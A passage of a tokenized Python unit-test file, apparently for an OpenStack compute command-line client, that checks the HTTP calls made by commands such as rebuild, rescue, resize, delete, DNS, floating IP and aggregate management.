'<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_rebuild_password ( self ) : <EOL> output , _ = self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_rebuild_preserve_ephemeral ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> def test_rebuild_name_meta ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' % FAKE_UUID_1 ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_1 , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : FAKE_UUID_1 , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:5> ) <EOL> def test_start ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_start_with_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_stop ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_stop_with_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_pause ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_unpause ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_lock ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_unlock ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_suspend ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_resume ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_rescue ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_rescue_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_rescue_image ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def test_unrescue ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_shelve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_shelve_offload ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_unshelve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_migrate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_rename ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } ) <EOL> def test_resize ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def test_resize_confirm ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_resize_revert ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> @ mock . patch ( '<STR_LIT>' , mock . Mock ( return_value = '<STR_LIT:p>' ) ) <EOL> def test_set_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:p>' } } ) <EOL> @ mock . patch ( '<STR_LIT>' , mock . Mock ( return_value = '<STR_LIT:p>' ) ) <EOL> def test_root_password ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:p>' } } ) <EOL> def test_scrub ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , <EOL> pos = - <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : None } , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % FAKE_UUID_2 , pos = <NUM_LIT:4> ) <EOL> def test_show_no_image ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_show_bad_id ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . run_command , '<STR_LIT>' ) <EOL> def test_show_unavailable_image_and_flavor ( self ) : <EOL> output , _ = self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:8> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = - <NUM_LIT:7> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = - <NUM_LIT:3> ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_print_server ( self , mock_print_dict ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> args , kwargs = mock_print_dict . call_args <EOL> parsed_server = args [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> parsed_server [ '<STR_LIT>' ] ) <EOL> def test_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_force_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_restore ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } ) <EOL> def test_restore_withname ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , { '<STR_LIT>' : None } , <EOL> pos = <NUM_LIT:2> ) <EOL> def test_delete_two_with_two_existent ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:5> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = - <NUM_LIT:6> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:5> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = - <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_delete_two_with_two_existent_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , <EOL> pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:5> ) <EOL> def test_delete_two_with_one_nonexistent ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> self . assert_called_anytime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . 
run_command , cmd ) <EOL> self . assert_called_anytime ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_delete_one_with_one_nonexistent ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_delete_two_with_two_nonexistent ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_diagnostics ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_refresh_network ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> } ] } ) <EOL> def test_set_meta_set ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_set_meta_delete_dict ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> def test_set_meta_delete_keys ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> def test_set_host_meta ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } , <EOL> pos = <NUM_LIT:4> ) <EOL> def test_set_host_meta_with_no_servers ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_delete_host_meta ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , pos = <NUM_LIT:2> ) <EOL> def test_dns_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_dns_create_public_domain ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_dns_create_private_domain ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_dns_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_dns_delete_domain ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_dns_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_dns_domains ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_floating_ip_bulk_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_floating_ip_bulk_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_floating_ip_bulk_create_host_and_interface ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_floating_ip_bulk_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_server_floating_ip_add ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_server_floating_ip_remove ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_server_floating_ip_associate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_server_floating_ip_disassociate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:address>' : '<STR_LIT>' } } ) <EOL> def test_usage_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_usage_list_no_args ( self ) : <EOL> timeutils . set_time_override ( datetime . datetime ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> self . addCleanup ( timeutils . clear_time_override ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_usage ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_usage_no_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> def test_flavor_delete ( self ) : <EOL> self . run_command ( "<STR_LIT>" ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_flavor_create ( self ) : <EOL> self . 
run_command ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_delete_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_aggregate_delete_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_aggregate_update_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_update_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_update_with_availability_zone_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT:foo>" , "<STR_LIT>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_update_with_availability_zone_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:name>" : "<STR_LIT:foo>" , "<STR_LIT>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_set_metadata_add_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_set_metadata_add_duplicate_by_id ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_aggregate_set_metadata_delete_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : None } } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_set_metadata_delete_missing_by_id ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_aggregate_set_metadata_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_add_host_by_id ( self ) : <EOL> self . 
